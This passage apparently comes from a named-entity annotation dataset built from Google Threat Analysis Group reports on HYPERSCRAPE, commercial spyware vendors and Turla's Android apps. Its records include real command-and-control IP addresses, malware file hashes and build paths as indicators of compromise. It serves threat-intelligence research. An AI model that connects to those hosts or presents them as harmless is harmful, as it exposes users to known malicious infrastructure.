{"id":4693,"text":"We’ll also continue to apply those findings internally to improve the safety and security of our products so we can effectively combat threats and protect users who rely on our services.","entities":[],"relations":[],"Comments":[]} {"id":4694,"text":"In the meantime, we encourage high risk users to enroll in our Advanced Protection Program (APP) and utilize Google Account Level Enhanced Safe Browsing to ensure they have the greatest level of protection in the face of ongoing threats.","entities":[],"relations":[],"Comments":[]} {"id":4695,"text":"C2s 136.243.108.14 173.209.51.54 HYPERSCRAPE binaries","entities":[{"id":50578,"label":"malware","start_offset":33,"end_offset":44},{"id":14210,"label":"IPV4","start_offset":4,"end_offset":18},{"id":14211,"label":"IPV4","start_offset":19,"end_offset":32}],"relations":[],"Comments":[]} {"id":4696,"text":"03d0e7ad4c12273a42e4c95d854408b98b0cf5ecf5f8c5ce05b24729b6f4e369 35a485972282b7e0e8e3a7a9cbf86ad93856378fd96cc8e230be5099c4b89208 5afc59cd2b39f988733eba427c8cf6e48bd2e9dc3d48a4db550655efe0dca798 6dc0600de00ba6574488472d5c48aa2a7b23a74ff1378d8aee6a93ea0ee7364f 767bd025c8e7d36f64dbd636ce0f29e873d1e3ca415d5ad49053a68918fe89f4 977f0053690684eb509da27d5eec2a560311c084a4a133191ef387e110e8b85f ac8e59e8abeacf0885b451833726be3e8e2d9c88d21f27b16ebe00f00c1409e6 cd2ba296828660ecd07a36e8931b851dda0802069ed926b3161745aae9aa6daa Microsoft Live DLL 1a831a79a932edd0398f46336712eff90ebb5164a189ef38c4dacc64ba84fe23 PDB E:\\Working\\Projects\\EmailDownloader\\EmailDownloaderCookieMode\\EmailDownloader\\obj\\Debug\\EmailDownloader.pdb E:\\Working\\Projects\\EmailDownloader\\EmailDownloaderCookieMode\\Mahdi\\LiveLib\\obj\\Release\\LiveLib.pdb","entities":[{"id":50579,"label":"FILEPATH","start_offset":608,"end_offset":715},{"id":50580,"label":"FILEPATH","start_offset":716,"end_offset":815},{"id":14212,"label":"SHA2","start_offset":0,"end_offset":64},{"id":14216,"label":"SHA2","start_offset":260,"end_offset":324},{"id":14217,"label":"SHA2","start_offset":325,"end_offset":389},{"id":14218,"label":"SHA2","start_offset":390,"end_offset":454},{"id":14219,"label":"SHA2","start_offset":455,"end_offset":519},{"id":14220,"label":"identity","start_offset":520,"end_offset":529},{"id":14213,"label":"SHA2","start_offset":65,"end_offset":129},{"id":14214,"label":"SHA2","start_offset":130,"end_offset":194},{"id":14215,"label":"SHA2","start_offset":195,"end_offset":259},{"id":14221,"label":"SHA2","start_offset":539,"end_offset":603}],"relations":[],"Comments":[]} {"id":4697,"text":"This bulletin includes coordinated influence operation campaigns terminated on our platforms in Q2 2022.","entities":[{"id":50581,"label":"TIME","start_offset":96,"end_offset":103}],"relations":[],"Comments":[]} {"id":4698,"text":"It was last updated on July 29, 2022.","entities":[{"id":50582,"label":"TIME","start_offset":23,"end_offset":36}],"relations":[],"Comments":[]} {"id":4699,"text":" The following testimony was delivered to the U.S. House Intelligence Committee by Shane Huntley, Senior Director of Google’s Threat Analysis Group (TAG) on July 27, 2022. Chairman Schiff, Ranking Member Turner, and esteemed Members of the Committee: Thank you for the opportunity to appear before the Committee to discuss Google’s efforts to protect users from commercial spyware.","entities":[{"id":50584,"label":"identity","start_offset":83,"end_offset":96},{"id":50585,"label":"TIME","start_offset":157,"end_offset":170},{"id":50587,"label":"identity","start_offset":324,"end_offset":330},{"id":50583,"label":"identity","start_offset":46,"end_offset":79},{"id":50586,"label":"identity","start_offset":173,"end_offset":188},{"id":50588,"label":"identity","start_offset":98,"end_offset":153}],"relations":[],"Comments":[]} {"id":4700,"text":"We appreciate the Committee’s efforts to raise awareness about the commercial spyware industry that is thriving and growing, creating risks to Americans and Internet users across the globe.","entities":[],"relations":[],"Comments":[]} {"id":4701,"text":" Google has been tracking the activities of commercial spyware vendors for years, and we have been taking critical steps to protect our users.","entities":[{"id":50589,"label":"identity","start_offset":1,"end_offset":7}],"relations":[],"Comments":[]} {"id":4702,"text":"We take the security of our users very seriously, and we have dedicated teams in place to protect against attacks from a wide range of sources.","entities":[],"relations":[],"Comments":[]} {"id":4703,"text":"Our Threat Analysis Group, or TAG, is dedicated to protecting users from threats posed by state-sponsored malware attacks and other advanced persistent threats.","entities":[{"id":50590,"label":"identity","start_offset":4,"end_offset":25},{"id":50591,"label":"identity","start_offset":30,"end_offset":33}],"relations":[],"Comments":[]} {"id":4704,"text":"TAG actively monitors threat actors and the evolution of their tactics and techniques.","entities":[{"id":50592,"label":"identity","start_offset":0,"end_offset":3}],"relations":[],"Comments":[]} {"id":4705,"text":"For example, TAG has been closely tracking and disrupting campaigns targeting individuals and organizations in Ukraine, and frequently publishes reports on Russian threat actors.","entities":[{"id":50593,"label":"identity","start_offset":13,"end_offset":16},{"id":50594,"label":"location","start_offset":111,"end_offset":118},{"id":50595,"label":"location","start_offset":156,"end_offset":163}],"relations":[],"Comments":[]} {"id":4706,"text":"We use our research to continuously improve the safety and security of our products and share this intelligence with our industry peers.","entities":[],"relations":[],"Comments":[]} {"id":4707,"text":"We also publicly release information about the operations we disrupt, which is available to our government partners and the general public.","entities":[],"relations":[],"Comments":[]} {"id":4708,"text":"TAG tracks and proactively counters serious state-sponsored and financially motivated information cyber criminal activities, such as hacking and the use of spyware.","entities":[{"id":50596,"label":"identity","start_offset":0,"end_offset":3}],"relations":[],"Comments":[]} {"id":4709,"text":"And we don’t just plug security holes – we work to eliminate entire classes of threats for consumers and businesses whose work depends on the Internet.","entities":[],"relations":[],"Comments":[]} {"id":4710,"text":"We are joined in this effort by many other security teams at Google, including Project Zero, our team of security researchers at Google who study zero-day vulnerabilities in the hardware and software systems that are depended upon by users around the world.","entities":[{"id":50597,"label":"identity","start_offset":61,"end_offset":67},{"id":50598,"label":"identity","start_offset":79,"end_offset":91},{"id":50599,"label":"identity","start_offset":129,"end_offset":135}],"relations":[],"Comments":[]} {"id":4711,"text":" Google has a long track record combating commercial surveillance tools targeting our users.","entities":[{"id":50600,"label":"identity","start_offset":1,"end_offset":7}],"relations":[],"Comments":[]} {"id":4712,"text":"In 2017, Android – which is owned by Google – was the first mobile platform to warn users about NSO Group’s Pegasus spyware.","entities":[{"id":50601,"label":"TIME","start_offset":3,"end_offset":7},{"id":50602,"label":"SOFTWARE","start_offset":9,"end_offset":16},{"id":50603,"label":"identity","start_offset":37,"end_offset":43},{"id":50604,"label":"threat-actor","start_offset":96,"end_offset":105},{"id":50605,"label":"malware","start_offset":108,"end_offset":115}],"relations":[],"Comments":[]} {"id":4713,"text":"At the time, our Android team released research about a newly discovered family of spyware related to Pegasus that was used in a targeted attack on a small number of Android devices.","entities":[{"id":50607,"label":"malware","start_offset":102,"end_offset":109},{"id":50608,"label":"SOFTWARE","start_offset":166,"end_offset":173},{"id":50606,"label":"SOFTWARE","start_offset":17,"end_offset":24}],"relations":[],"Comments":[]} {"id":4714,"text":"We observed fewer than three dozen installs of this spyware.","entities":[],"relations":[],"Comments":[]} {"id":4715,"text":"We remediated the compromises for these users and implemented controls to protect all Android users.","entities":[{"id":50609,"label":"SOFTWARE","start_offset":86,"end_offset":93}],"relations":[],"Comments":[]} {"id":4716,"text":"NSO Group continues to pose risks across the Internet ecosystem.","entities":[{"id":50610,"label":"threat-actor","start_offset":0,"end_offset":9}],"relations":[],"Comments":[]} {"id":4717,"text":"In 2019, we confronted the risks posed by NSO Group again, relying upon NSO Groups’s marketing information suggesting that they had a 0-day exploit for Android.","entities":[{"id":50611,"label":"TIME","start_offset":3,"end_offset":7},{"id":50612,"label":"threat-actor","start_offset":42,"end_offset":51},{"id":50614,"label":"SOFTWARE","start_offset":152,"end_offset":159},{"id":50613,"label":"threat-actor","start_offset":72,"end_offset":82},{"id":50615,"label":"attack-pattern","start_offset":134,"end_offset":147}],"relations":[],"Comments":[]} {"id":4718,"text":"Google was able to identify the vulnerability in use and fix the exploit quickly.","entities":[{"id":50616,"label":"identity","start_offset":0,"end_offset":6}],"relations":[],"Comments":[]} {"id":4719,"text":"In December 2021, we released research about novel techniques used by NSO Group to compromise iMessage users.","entities":[{"id":50617,"label":"TIME","start_offset":3,"end_offset":16},{"id":50618,"label":"threat-actor","start_offset":70,"end_offset":79},{"id":50619,"label":"SOFTWARE","start_offset":94,"end_offset":102}],"relations":[],"Comments":[]} {"id":4720,"text":"iPhone users could be compromised by receiving a malicious iMessage text, without ever needing to click a malicious link.","entities":[{"id":50620,"label":"SOFTWARE","start_offset":59,"end_offset":67}],"relations":[],"Comments":[]} {"id":4721,"text":"Short of not using a device, there is no way to prevent exploitation by a zero-click exploit; it's a weapon against which there is no defense.","entities":[],"relations":[],"Comments":[]} {"id":4722,"text":"Based on our research and findings, we assessed this to be one of the most technically sophisticated exploits we had ever seen, further demonstrating that the capabilities NSO provides rival those previously thought to be accessible to only a handful of nation states.","entities":[{"id":50621,"label":"threat-actor","start_offset":172,"end_offset":175}],"relations":[],"Comments":[]} {"id":4723,"text":"Although this Committee must be concerned with the exploits of NSO Group, it is not the only entity posing risks to our users.","entities":[{"id":50622,"label":"threat-actor","start_offset":63,"end_offset":72}],"relations":[],"Comments":[]} {"id":4724,"text":"For example, TAG discovered campaigns targeting Armenian users which utilized zero-day vulnerabilities in Chrome and Internet Explorer.","entities":[{"id":50623,"label":"threat-actor","start_offset":13,"end_offset":16},{"id":50624,"label":"location","start_offset":48,"end_offset":56},{"id":50625,"label":"attack-pattern","start_offset":78,"end_offset":102},{"id":50626,"label":"SOFTWARE","start_offset":106,"end_offset":112},{"id":50627,"label":"SOFTWARE","start_offset":117,"end_offset":134}],"relations":[],"Comments":[]} {"id":4725,"text":"We assessed that a surveillance vendor packaged and sold these technologies.","entities":[],"relations":[],"Comments":[]} {"id":4726,"text":"Reporting by CitizenLab linked this activity to Candiru, an Israeli spyware vendor.","entities":[{"id":50628,"label":"identity","start_offset":13,"end_offset":23},{"id":50629,"label":"threat-actor","start_offset":48,"end_offset":55},{"id":50630,"label":"identity","start_offset":60,"end_offset":82}],"relations":[],"Comments":[]} {"id":4727,"text":"Other reporting from Microsoft has linked this spyware to the compromise of dozens of victims, including political dissidents, human rights activists, journalists, and academics.","entities":[{"id":50631,"label":"identity","start_offset":21,"end_offset":30}],"relations":[],"Comments":[]} {"id":4728,"text":"Most recently, we reported in May on five zero-day vulnerabilities affecting Chrome and Android which were used to compromise Android users.","entities":[{"id":50632,"label":"SOFTWARE","start_offset":77,"end_offset":83},{"id":50633,"label":"SOFTWARE","start_offset":88,"end_offset":95},{"id":50634,"label":"SOFTWARE","start_offset":126,"end_offset":133},{"id":50635,"label":"vulnerability","start_offset":37,"end_offset":66}],"relations":[{"id":983,"from_id":50632,"to_id":50635,"type":"has"},{"id":984,"from_id":50633,"to_id":50635,"type":"has"},{"id":985,"from_id":50634,"to_id":50635,"type":"has"}],"Comments":[]} {"id":4729,"text":"We assess with high confidence that commercial surveillance company Cytrox packaged these vulnerabilities, and sold the hacking software to at least eight governments.","entities":[{"id":50636,"label":"identity","start_offset":68,"end_offset":74}],"relations":[],"Comments":[]} {"id":4730,"text":"Among other targets, this spyware was used to compromise journalists and opposition politicians.","entities":[],"relations":[],"Comments":[]} {"id":4731,"text":"Our reporting is consistent with earlier analysis produced by CitizenLab and Meta.","entities":[{"id":50637,"label":"identity","start_offset":62,"end_offset":72},{"id":50638,"label":"identity","start_offset":77,"end_offset":81}],"relations":[],"Comments":[]} {"id":4732,"text":"TAG also recently released information on a segment of attackers we call “hack-for-hire” that focuses on compromising accounts and exfiltrating data as a service.","entities":[{"id":50640,"label":"attack-pattern","start_offset":74,"end_offset":87},{"id":50641,"label":"attack-pattern","start_offset":131,"end_offset":161},{"id":50639,"label":"identity","start_offset":0,"end_offset":3}],"relations":[],"Comments":[]} {"id":4733,"text":"In contrast to commercial surveillance vendors, who we generally observe selling a capability for the end user to operate, hack-for-hire firms conduct attacks themselves.","entities":[{"id":50642,"label":"attack-pattern","start_offset":123,"end_offset":136}],"relations":[],"Comments":[]} {"id":4734,"text":"They target a wide range of users and opportunistically take advantage of known security flaws when undertaking their campaigns.","entities":[],"relations":[],"Comments":[]} {"id":4735,"text":"In June, we provided examples of the hack-for-hire ecosystem from India, Russia, and the United Arab Emirates.","entities":[{"id":50647,"label":"location","start_offset":89,"end_offset":109},{"id":50643,"label":"TIME","start_offset":3,"end_offset":7},{"id":50644,"label":"attack-pattern","start_offset":37,"end_offset":50},{"id":50645,"label":"location","start_offset":66,"end_offset":71},{"id":50646,"label":"location","start_offset":73,"end_offset":79}],"relations":[],"Comments":[]} {"id":4736,"text":"The growth of commercial spyware vendors and hack-for-hire groups has necessitated growth in TAG to counter these threats.","entities":[{"id":50648,"label":"identity","start_offset":93,"end_offset":96}],"relations":[],"Comments":[]} {"id":4737,"text":"Where once we only needed substreams to focus on threat actors such as China, Russia, and North Korea, TAG now has a dedicated analysis subteam dedicated to commercial vendors and operators.","entities":[{"id":50649,"label":"location","start_offset":71,"end_offset":76},{"id":50650,"label":"location","start_offset":78,"end_offset":84},{"id":50651,"label":"location","start_offset":90,"end_offset":101},{"id":50652,"label":"identity","start_offset":103,"end_offset":106}],"relations":[],"Comments":[]} {"id":4738,"text":" Our findings underscore the extent to which commercial surveillance vendors have proliferated capabilities historically only used by governments.","entities":[],"relations":[],"Comments":[]} {"id":4739,"text":"These vendors operate with deep technical expertise to develop and operationalize exploits.","entities":[],"relations":[],"Comments":[]} {"id":4740,"text":"We believe its use is growing, fueled by demand from governments.","entities":[],"relations":[],"Comments":[]} {"id":4741,"text":"Seven of the nine zero-day vulnerabilities our Threat Analysis Group discovered in 2021 were originally developed by commercial providers and sold to and used by state-sponsored actors.","entities":[{"id":50653,"label":"identity","start_offset":47,"end_offset":68},{"id":50654,"label":"TIME","start_offset":83,"end_offset":87}],"relations":[],"Comments":[]} {"id":4742,"text":"TAG is actively tracking more than 30 vendors with varying levels of sophistication and public exposure selling exploits or surveillance capabilities to state-sponsored actors.","entities":[{"id":50655,"label":"identity","start_offset":0,"end_offset":3}],"relations":[],"Comments":[]} {"id":4743,"text":"This industry appears to be thriving.","entities":[],"relations":[],"Comments":[]} {"id":4744,"text":"In fact, there was recently a large industry conference in Europe, sponsored by many of the commercial spyware vendors we track.","entities":[{"id":50656,"label":"location","start_offset":59,"end_offset":65}],"relations":[],"Comments":[]} {"id":4745,"text":"This trend should be concerning to the United States and all citizens.","entities":[{"id":50657,"label":"location","start_offset":39,"end_offset":52}],"relations":[],"Comments":[]} {"id":4746,"text":"These vendors are enabling the proliferation of dangerous hacking tools, arming nation state actors that would not otherwise be able to develop these capabilities in-house.","entities":[],"relations":[],"Comments":[]} {"id":4747,"text":"While use of surveillance technologies may be legal under national or international laws, they are found to be used by some state actors for purposes antithetical to democratic values: targeting dissidents, journalists, human rights workers, and opposition party politicians.","entities":[],"relations":[],"Comments":[]} {"id":4748,"text":"We have also observed proliferation risk from nation state actors attempting to gain access to the exploits of these vendors.","entities":[],"relations":[],"Comments":[]} {"id":4749,"text":"Last year, TAG identified an ongoing campaign targeting security researchers working on vulnerability research and development at different companies and organizations.","entities":[{"id":50658,"label":"identity","start_offset":11,"end_offset":14}],"relations":[],"Comments":[]} {"id":4750,"text":"The actors behind this campaign, which we attributed to a government-backed entity based in North Korea, have employed a number of means to target researchers.","entities":[{"id":50659,"label":"location","start_offset":92,"end_offset":103}],"relations":[],"Comments":[]} {"id":4751,"text":"In addition to these concerns, there are other reasons why this industry presents a risk more broadly across the Internet.","entities":[],"relations":[],"Comments":[]} {"id":4752,"text":"While vulnerability research is an important contributor to online safety when that research is used to improve the security of products, vendors stockpiling zero-day vulnerabilities in secret can pose a severe risk to the Internet when the vendor itself gets compromised.","entities":[],"relations":[],"Comments":[]} {"id":4753,"text":"This has happened to multiple spyware vendors over the past ten years, raising the specter that their stockpiles can be released publicly without warning.","entities":[],"relations":[],"Comments":[]} {"id":4754,"text":"The proliferation of commercial hacking tools is a threat to national security, making the Internet less safe and undermining the trust on which a vibrant, inclusive digital society depends.","entities":[],"relations":[],"Comments":[]} {"id":4755,"text":"This is why when Google discovers these activities, we not only take steps to protect users, but also disclose that information publicly to raise awareness and help the entire ecosystem, in line with our historical commitment to openness and democratic values.","entities":[{"id":50660,"label":"identity","start_offset":17,"end_offset":23}],"relations":[],"Comments":[]} {"id":4756,"text":"Across all Google products, we incorporate industry-leading security features and protections to keep our users safe.","entities":[{"id":50661,"label":"identity","start_offset":11,"end_offset":17}],"relations":[],"Comments":[]} {"id":4757,"text":"On Search, Google’s Safe Browsing is an industry-leading service to identify unsafe websites across the web and notify users and website owners of potential harm.","entities":[{"id":50662,"label":"SOFTWARE","start_offset":11,"end_offset":33}],"relations":[],"Comments":[]} {"id":4758,"text":"Google Safe Browsing helps protect over four billion devices every day by showing warnings to users when they attempt to navigate to unsafe sites or download harmful files.","entities":[{"id":50663,"label":"SOFTWARE","start_offset":0,"end_offset":20}],"relations":[],"Comments":[]} {"id":4759,"text":"Safe Browsing also notifies webmasters when their websites are compromised by malicious actors and helps them diagnose and resolve the problem so that their visitors stay safer.","entities":[{"id":50664,"label":"SOFTWARE","start_offset":0,"end_offset":13}],"relations":[],"Comments":[]} {"id":4760,"text":"On Gmail, we recommend certain Gmail security precautions to prevent spoofing, phishing, and spam.","entities":[{"id":50667,"label":"attack-pattern","start_offset":69,"end_offset":77},{"id":50665,"label":"SOFTWARE","start_offset":3,"end_offset":8},{"id":50666,"label":"SOFTWARE","start_offset":31,"end_offset":36},{"id":50668,"label":"attack-pattern","start_offset":79,"end_offset":87},{"id":50669,"label":"attack-pattern","start_offset":93,"end_offset":97}],"relations":[],"Comments":[]} {"id":4761,"text":"Spoofers may send forged messages using an organization’s real name or domain to subvert authentication measures.","entities":[],"relations":[],"Comments":[]} {"id":4762,"text":"We use email authentication to protect against email spoofing, which is when email content is changed to make the message appear from someone or somewhere other than the actual source.","entities":[],"relations":[],"Comments":[]} {"id":4763,"text":"And we offer other advanced phishing and malware protection to administrators to better protect their users.","entities":[],"relations":[],"Comments":[]} {"id":4764,"text":"By default, Gmail displays warnings and moves untrustworthy emails to the user’s spam folder.","entities":[{"id":50670,"label":"SOFTWARE","start_offset":12,"end_offset":17}],"relations":[],"Comments":[]} {"id":4765,"text":"However administrators can also use advanced security settings to enhance their users’ protection against suspicious attachments and scripts from untrusted senders.","entities":[],"relations":[],"Comments":[]} {"id":4766,"text":"For Android, through its entire development lifecycle, we subject the products to a rigorous security program.","entities":[{"id":50671,"label":"SOFTWARE","start_offset":4,"end_offset":11}],"relations":[],"Comments":[]} {"id":4767,"text":"The Android security process begins early in the development lifecycle, and each major feature of the platform is reviewed by engineering and security resources.","entities":[{"id":50672,"label":"SOFTWARE","start_offset":4,"end_offset":11}],"relations":[],"Comments":[]} {"id":4768,"text":"We ensure appropriate controls are built into the architecture of the system.","entities":[],"relations":[],"Comments":[]} {"id":4769,"text":"During the development stage, Android-created and open source components are subject to vigorous security reviews","entities":[{"id":50673,"label":"SOFTWARE","start_offset":30,"end_offset":37}],"relations":[],"Comments":[]} {"id":4770,"text":"For users, Android provides safety and control over how apps and third parties can access the data from their devices.","entities":[{"id":50674,"label":"SOFTWARE","start_offset":11,"end_offset":18}],"relations":[],"Comments":[]} {"id":4771,"text":"For example, users are provided visibility into the permissions requested by each app, and they are able to control those permissions.","entities":[],"relations":[],"Comments":[]} {"id":4772,"text":"We have also built additional tools to prevent successful attacks on devices that run Android once those devices are in users’ hands.","entities":[],"relations":[],"Comments":[]} {"id":4773,"text":"For example, Google Play Protect, our built-in malware protection for Android, continuously scans devices for potentially harmful applications.","entities":[{"id":50675,"label":"SOFTWARE","start_offset":13,"end_offset":32},{"id":50676,"label":"SOFTWARE","start_offset":70,"end_offset":77}],"relations":[],"Comments":[]} {"id":4774,"text":"Although our security precautions are robust, security issues can still occur, which is why we created a comprehensive security response process to respond to incidents.","entities":[],"relations":[],"Comments":[]} {"id":4775,"text":"Google manages a vulnerability rewards program (VRP), rewarding researchers millions of dollars for their contributions in securing our devices and platforms.","entities":[{"id":50677,"label":"identity","start_offset":0,"end_offset":6}],"relations":[],"Comments":[]} {"id":4776,"text":"We also provide research grants to security researchers to help fund and support the research community.","entities":[],"relations":[],"Comments":[]} {"id":4777,"text":"This is all part of a larger strategy to keep Google products and users, as well as the Internet at large more secure.","entities":[{"id":50678,"label":"identity","start_offset":46,"end_offset":52}],"relations":[],"Comments":[]} {"id":4778,"text":"Project Zero is also a critical component of this strategy, pushing transparency and more timely patching of vulnerabilities.","entities":[{"id":50679,"label":"identity","start_offset":0,"end_offset":12}],"relations":[],"Comments":[]} {"id":4779,"text":"Finally, we also offer the leading tools to protect important civil society actors such as journalists, human rights workers, opposition party politicians, and campaign organizations – in other words, the users who are frequently targeted by surveillance tools.","entities":[],"relations":[],"Comments":[]} {"id":4780,"text":"Google developed Project Shield, a free protection against distributed denial of service (DDoS) attacks, to protect news media and human rights organization websites.","entities":[{"id":50680,"label":"identity","start_offset":0,"end_offset":6},{"id":50681,"label":"attack-pattern","start_offset":59,"end_offset":95}],"relations":[],"Comments":[]} {"id":4781,"text":"We recently expanded eligibility to protect Ukraine government organizations, and we are currently protecting over 200 Ukraine websites today.","entities":[{"id":50682,"label":"location","start_offset":44,"end_offset":51},{"id":50683,"label":"location","start_offset":119,"end_offset":126}],"relations":[],"Comments":[]} {"id":4782,"text":"To protect high risk user accounts, we offer the Advanced Protection Program (APP), which is our highest form of account security.","entities":[],"relations":[],"Comments":[]} {"id":4783,"text":"APP has a strong track record protecting users – since the program’s inception, there are no documented cases of an account compromise via phishing.","entities":[{"id":50685,"label":"attack-pattern","start_offset":116,"end_offset":147}],"relations":[],"Comments":[]} {"id":4784,"text":" We believe it is time for government, industry and civil society to come together to change the incentive structure which has allowed these technologies to spread in secret.","entities":[],"relations":[],"Comments":[]} {"id":4785,"text":"The first step is to understand the scope of the problem.","entities":[],"relations":[],"Comments":[]} {"id":4786,"text":"We appreciate the Committee’s focus on this issue, and recommend the U.S. Intelligence Community prioritize identifying and analyzing threats from foreign commercial spyware providers as being on par with other major advanced threat actors.","entities":[{"id":50686,"label":"identity","start_offset":69,"end_offset":96}],"relations":[],"Comments":[]} {"id":4787,"text":"The U.S. should also consider ways to foster greater transparency in the marketplace, including setting heightened transparency requirements for the domestic surveillance industry.","entities":[{"id":50687,"label":"identity","start_offset":4,"end_offset":8}],"relations":[],"Comments":[]} {"id":4788,"text":"The U.S. could also set an example to other governments by reviewing and disclosing its own historical use of these tools.","entities":[{"id":50688,"label":"identity","start_offset":4,"end_offset":8}],"relations":[],"Comments":[]} {"id":4789,"text":"We welcome recent steps taken by the government in applying sanctions to the NSO Group and Candiru, and we believe other governments should consider expanding these restrictions.","entities":[{"id":50689,"label":"threat-actor","start_offset":77,"end_offset":86},{"id":50690,"label":"threat-actor","start_offset":91,"end_offset":98}],"relations":[],"Comments":[]} {"id":4790,"text":"Additionally, the U.S. government should consider a full ban on Federal procurement of commercial spyware technologies and contemplate imposing further sanctions to limit spyware vendors’ ability to operate in the U.S. and receive U.S. investment.","entities":[{"id":50692,"label":"identity","start_offset":214,"end_offset":218},{"id":50693,"label":"identity","start_offset":231,"end_offset":235},{"id":50691,"label":"identity","start_offset":18,"end_offset":33}],"relations":[],"Comments":[]} {"id":4791,"text":"The harms from this industry are amply evident by this point, and we believe they outweigh any benefit to continued use.","entities":[],"relations":[],"Comments":[]} {"id":4792,"text":"Finally, we urge the United States to lead a diplomatic effort to work with the governments of the countries who harbor problematic vendors, as well as those who employ these tools, to build support for measures that limit harms caused by this industry.","entities":[{"id":50694,"label":"identity","start_offset":21,"end_offset":34}],"relations":[],"Comments":[]} {"id":4793,"text":"Any one government’s ability to meaningfully impact this market is limited; only through a concerted international effort can this serious risk to online safety be mitigated.","entities":[],"relations":[],"Comments":[]} {"id":4794,"text":"Google is investing heavily as a company and as an industry to counter serious threats to our users.","entities":[{"id":50695,"label":"identity","start_offset":0,"end_offset":6}],"relations":[],"Comments":[]} {"id":4795,"text":"In the modern world, we must be able to trust the devices we use every day and ensure that foreign adversaries do not have access to sophisticated exploits.","entities":[],"relations":[],"Comments":[]} {"id":4796,"text":"While we continue to fight these threats on a technical level, the providers of these capabilities operate openly in democratic countries.","entities":[],"relations":[],"Comments":[]} {"id":4797,"text":"Google is committed to leading the industry in detecting and disrupting these threats.","entities":[{"id":50696,"label":"identity","start_offset":0,"end_offset":6}],"relations":[],"Comments":[]} {"id":4798,"text":"I thank the Committee for this attention on this critical issue.","entities":[],"relations":[],"Comments":[]} {"id":4799,"text":"Google’s Threat Analysis Group (TAG) continues to closely monitor the cybersecurity environment in Eastern Europe with regard to the war in Ukraine.","entities":[{"id":50699,"label":"location","start_offset":140,"end_offset":147},{"id":50697,"label":"identity","start_offset":0,"end_offset":36},{"id":50698,"label":"identity","start_offset":99,"end_offset":113}],"relations":[],"Comments":[]} {"id":4800,"text":"Many Russian government cyber assets have remained focused on Ukraine and related issues since the invasion began, while Russian APT activity outside of Ukraine largely remains the same.","entities":[{"id":50702,"label":"location","start_offset":62,"end_offset":69},{"id":50703,"label":"threat-actor","start_offset":121,"end_offset":132},{"id":50704,"label":"location","start_offset":153,"end_offset":160},{"id":50701,"label":"threat-actor","start_offset":5,"end_offset":36}],"relations":[{"id":986,"from_id":50701,"to_id":50702,"type":"targets"}],"Comments":[]} {"id":4801,"text":"TAG continues to disrupt campaigns from multiple sets of Russian government-backed attackers, some of which are detailed in our previous updates.","entities":[{"id":50705,"label":"identity","start_offset":0,"end_offset":3}],"relations":[],"Comments":[]} {"id":4802,"text":"Similarly, Russian observed disinformation efforts are also focused on the war in Ukraine and TAG has disrupted coordinated influence operations from several actors including the Internet Research Agency and a Russian consulting firm as detailed in the TAG Bulletin.","entities":[{"id":50710,"label":"threat-actor","start_offset":179,"end_offset":203},{"id":50707,"label":"identity","start_offset":94,"end_offset":97},{"id":50709,"label":"attack-pattern","start_offset":28,"end_offset":42},{"id":50711,"label":"threat-actor","start_offset":210,"end_offset":233},{"id":50706,"label":"location","start_offset":82,"end_offset":89},{"id":50708,"label":"location","start_offset":11,"end_offset":18},{"id":50712,"label":"identity","start_offset":253,"end_offset":256}],"relations":[{"id":987,"from_id":50710,"to_id":50709,"type":"uses"},{"id":988,"from_id":50711,"to_id":50709,"type":"uses"},{"id":989,"from_id":50710,"to_id":50708,"type":"located-at"},{"id":990,"from_id":50711,"to_id":50708,"type":"located-at"},{"id":991,"from_id":50710,"to_id":50706,"type":"targets"},{"id":992,"from_id":50711,"to_id":50706,"type":"targets"}],"Comments":[]} {"id":4803,"text":"Most of these coordinated influence operations are Russian language efforts aimed at ensuring domestic support in Russia for the war.","entities":[{"id":50713,"label":"location","start_offset":114,"end_offset":120}],"relations":[],"Comments":[]} {"id":4804,"text":"Here is a deeper look at some campaign activity TAG has observed since our last update: Turla, a group publicly attributed to Russia’s Federal Security Service (FSB), recently hosted Android apps on a domain spoofing the Ukrainian Azov Regiment.","entities":[{"id":50714,"label":"identity","start_offset":48,"end_offset":51},{"id":50715,"label":"threat-actor","start_offset":88,"end_offset":93},{"id":50719,"label":"SOFTWARE","start_offset":183,"end_offset":190},{"id":50716,"label":"location","start_offset":126,"end_offset":132},{"id":50717,"label":"identity","start_offset":135,"end_offset":165},{"id":50718,"label":"identity","start_offset":221,"end_offset":244}],"relations":[{"id":994,"from_id":50717,"to_id":50716,"type":"located-at"},{"id":995,"from_id":50715,"to_id":50717,"type":"attributed-to"},{"id":996,"from_id":50715,"to_id":50718,"type":"impersonates"},{"id":997,"from_id":50715,"to_id":50719,"type":"uses"}],"Comments":[]} {"id":4805,"text":"This is the first known instance of Turla distributing Android-related malware.","entities":[{"id":50720,"label":"threat-actor","start_offset":36,"end_offset":41},{"id":50721,"label":"SOFTWARE","start_offset":55,"end_offset":62}],"relations":[],"Comments":[]} {"id":4806,"text":"The apps were not distributed through the Google Play Store, but hosted on a domain controlled by the actor and disseminated via links on third party messaging services.","entities":[{"id":50722,"label":"SOFTWARE","start_offset":42,"end_offset":59}],"relations":[],"Comments":[]} {"id":4807,"text":"We believe there was no major impact on Android users and that the number of installs was miniscule.","entities":[{"id":50723,"label":"SOFTWARE","start_offset":40,"end_offset":47}],"relations":[],"Comments":[]} {"id":4808,"text":"The app is distributed under the guise of performing Denial of Service (DoS) attacks against a set of Russian websites.","entities":[{"id":50724,"label":"attack-pattern","start_offset":53,"end_offset":84}],"relations":[],"Comments":[]} {"id":4809,"text":"However, the 'DoS' consists only of a single GET request to the target website, not enough to be effective.","entities":[{"id":50725,"label":"attack-pattern","start_offset":14,"end_offset":17}],"relations":[],"Comments":[]} {"id":4810,"text":"The list of target websites for the app can be seen in the CyberChef recipe here.","entities":[{"id":50726,"label":"tools","start_offset":59,"end_offset":68}],"relations":[],"Comments":[]} {"id":4811,"text":"During our investigation into the Turla CyberAzov apps, we identified another Android app first seen in the wild in March 2022 that also claimed to conduct DoS attacks against Russian websites.","entities":[{"id":50729,"label":"SOFTWARE","start_offset":78,"end_offset":89},{"id":50730,"label":"TIME","start_offset":116,"end_offset":126},{"id":50731,"label":"attack-pattern","start_offset":156,"end_offset":159},{"id":50727,"label":"threat-actor","start_offset":34,"end_offset":39},{"id":50728,"label":"malware","start_offset":40,"end_offset":49}],"relations":[{"id":998,"from_id":50727,"to_id":50728,"type":"uses"}],"Comments":[]} {"id":4812,"text":"In this case, the Android app name was stopwar.apk (com.ddos.stopwar) and was distributed from the website 